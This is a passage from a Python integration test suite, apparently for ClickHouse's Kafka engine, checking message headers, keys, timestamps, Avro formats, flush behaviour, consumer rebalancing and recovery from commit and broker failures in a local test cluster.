producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
# members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
# members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, "virt2_0")
kafka_delete_topic(admin_client, "virt2_1")
instance.rotate_logs()
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "insert3"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
kafka_delete_topic(admin_client, topic_name)
def test_kafka_insert_avro(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# default retention, since predefined timestamp_ms is used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "avro1", config=topic_config)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'avro1',
kafka_group_name = 'avro1',
kafka_commit_on_select = 1,
kafka_format = 'Avro';
''')
instance.query("INSERT INTO test.kafka select number*10 as key, number*100 as value, 1636505534 as _timestamp from numbers(4) SETTINGS output_format_avro_rows_in_file = 2, output_format_avro_codec = 'deflate'")
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'avro1', needDecode = False, timestamp = 1636505534))
if len(messages) == 2:
break
result = ''
for a_message in messages:
result += decode_avro(a_message) + '\n'
expected_result = """{'key': 0, 'value': 0, '_timestamp': 1636505534}
{'key': 10, 'value': 100, '_timestamp': 1636505534}
{'key': 20, 'value': 200, '_timestamp': 1636505534}
{'key': 30, 'value': 300, '_timestamp': 1636505534}
"""
assert (result == expected_result)
def test_kafka_produce_consume_avro(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "insert_avro"
kafka_create_topic(admin_client, topic_name)
num_rows = 75
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_writer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'avro',
kafka_group_name = 'avro',
kafka_format = 'Avro';
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'avro',
kafka_group_name = 'avro',
kafka_format = 'Avro';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer select number*10 as key, number*100 as value from numbers({num_rows}) SETTINGS output_format_avro_rows_in_file = 7".format(num_rows=num_rows))
instance.wait_for_log_line("Committed offset {offset}".format(offset=math.ceil(num_rows/7)))
expected_num_rows = instance.query("SELECT COUNT(1) FROM test.view", ignore_error=True)
assert (int(expected_num_rows) == num_rows)
expected_max_key = instance.query("SELECT max(key) FROM test.view", ignore_error=True)
assert (int(expected_max_key) == (num_rows - 1) * 10)
kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "flush_by_time"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happens during test, we need to check only result of first flush (part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "topic_with_multiple_partitions2"
kafka_create_topic(admin_client, topic_name, num_partitions=10)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "topic_with_multiple_partitions"
kafka_create_topic(admin_client, topic_name, num_partitions=11)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
# Waiting for test.kafka_consumerX to start consume ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
# I leave last one working by intent (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
kafka_delete_topic(admin_client, topic_name)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
# init PartitionManager (it starts container) earlier
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before write suffix
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while pushing to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# Waiting for test.kafka_consumer to start consume
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before we do commit
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
kafka_cluster.pause_container('kafka1')
# if we restore the connection too fast (<30sec) librdkafka will not report any timeout
# (alternative is to decrease the default session timeouts for librdkafka)
#
# when the delay is too long (>50sec) broker will decide to remove us from the consumer group,
# and will start answering "Broker: Unknown member"
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we came to partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit quesionable - we can just take a bigger pauses between polls instead -
# to do more job in a single pass, and give more rest for a thread.
# But in cases of some peaky loads in kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# also we can came to eof because we drained librdkafka internal queue too fast
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# messages created here will be consumed immedeately after MV creation
# reaching topic EOF.
# But we should not do flush immedeately after reaching EOF, because
# next poll can return more data, and we should respect kafka_flush_interval_ms
# and try to form bigger block
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments done during select, so it start sending data to test.destination
# immediately after creation of MV
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_commit_on_select = 1,
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO Kafka Engine from an empty SELECT sub query was leading to failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_commit_on_select = 1,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
